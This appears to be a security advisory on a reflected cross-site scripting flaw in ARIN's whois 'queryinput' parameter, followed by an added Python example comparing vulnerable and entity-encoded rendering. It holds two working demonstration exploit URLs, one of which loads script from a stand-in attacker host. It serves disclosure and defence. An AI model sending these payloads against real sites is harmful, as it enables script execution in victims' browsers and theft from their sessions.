Title
ARIN.NET input validation hole in "?queryinput=" allows remote users to conduct cross-site scripting attacks

Notification
Multiple attempts to contact ARIN site administrators went unanswered.

Exploit Included: Yes

Description
The whois query script behind "?queryinput=" does not properly validate user-supplied input (the reporter states that several parameters are affected) and does not filter HTML before echoing the value back into the response page. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary script code to be executed in the target user's browser in the origin of ws.arin.net. This is a reflected cross-site scripting flaw: the payload travels in the link itself, so the victim has to be induced to follow it, and it is repeated on every request that carries it.

Some demonstration exploit URLs are provided:

http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E

http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E

Decoded, the queryinput values are <IMG SRC="javascript:alert('XSS');"> and <SCRIPT SRC=http://maliciousCode.net/exploit.js></SCRIPT>. The first only fires in browsers that honour a javascript: URL in an image source (the Internet Explorer and Netscape 4 generation; current browsers refuse it), so it is a harmless proof of concept. The second fetches and runs a script from a host the attacker controls and works in any browser that renders the reflected tag; maliciousCode.net stands in for such a host.

Discovered by Terminal Entry security [.at.] peadro (.)net

This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.
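The following Python is an added example, not ARIN's whois code and not part of the reporter's advisory. It decodes the two demonstration URLs exactly as a CGI script would see the queryinput parameter, renders them through a hypothetical results-page template that echoes the value verbatim (the flaw described above) and through the same template with HTML-entity encoding applied, and then runs a browser-style tokenizer over both outputs to show which tags and javascript: URLs each one actually injects. The template text, TEMPLATE_TAGS, and the function names are assumptions made for the illustration.

```python
"""Reflected XSS through an echoed query parameter: vulnerable vs. hardened.

Added, self-contained example; it is not ARIN's whois code. The page
template and the parameter handling are assumptions that reproduce the
behaviour the advisory describes: whatever arrives in ?queryinput= is
copied into the response HTML unchanged.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# The two distinct demonstration URLs quoted in the advisory.
ADVISORY_URLS = [
    "http://ws.arin.net/whois/?queryinput="
    "%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E",
    "http://ws.arin.net/whois/?queryinput="
    "%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E",
]

# Tags the hypothetical template emits on its own; anything else found in
# the rendered page arrived through the parameter. (Assumption.)
TEMPLATE_TAGS = {"p"}


def query_input(url: str) -> str:
    """Decode ?queryinput= the way a CGI script sees it: percent-decoding
    plus '+' -> space. Returns '' when the parameter is absent."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("queryinput", [""])[0]


def render_vulnerable(query: str) -> str:
    """Hypothetical whois results page that echoes the search term verbatim.
    This is the flaw the advisory reports."""
    return "<p>Results for: " + query + "</p>"


def render_hardened(query: str) -> str:
    """Same page with the search term entity-encoded for the element-body
    context: '<', '>', '&' and both quote characters become entities, so the
    browser's tokenizer can never see an attacker-supplied tag."""
    return "<p>Results for: " + escape(query, quote=True) + "</p>"


class _TagCollector(HTMLParser):
    """Record every start tag (lower-cased) and every attribute whose value
    is a javascript: URL, as a browser tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.script_urls: list[tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if value and value.strip().lower().startswith("javascript:"):
                self.script_urls.append((tag, name))


def _tokenize(html_out: str) -> _TagCollector:
    collector = _TagCollector()
    collector.feed(html_out)
    collector.close()
    return collector


def injected_tags(html_out: str) -> list[str]:
    """Tags present in the rendered page that the template did not emit."""
    return [t for t in _tokenize(html_out).tags if t not in TEMPLATE_TAGS]


def javascript_urls(html_out: str) -> list[tuple[str, str]]:
    """(tag, attribute) pairs carrying a javascript: URL in the rendered page."""
    return _tokenize(html_out).script_urls


def audit(url: str) -> dict:
    """Show what a URL injects into the vulnerable page, and that the
    hardened rendering of the same input injects nothing."""
    payload = query_input(url)
    vulnerable_page = render_vulnerable(payload)
    return {
        "payload": payload,
        "vulnerable": injected_tags(vulnerable_page),
        "vulnerable_js_urls": javascript_urls(vulnerable_page),
        "hardened": injected_tags(render_hardened(payload)),
    }


if __name__ == "__main__":
    for u in ADVISORY_URLS:
        print(audit(u))
```

The check deliberately works on the parsed token stream rather than on a tag blocklist: the hardened output still contains the literal characters "javascript:" inside entity-encoded text, and a naive substring or regex filter would either flag it as a false positive or, worse, be the kind of blocklist an attacker bypasses with case and encoding tricks. Entity encoding is the right fix for the element-body context shown here; a value placed inside an attribute, a URL, or a script block needs the encoding appropriate to that context instead.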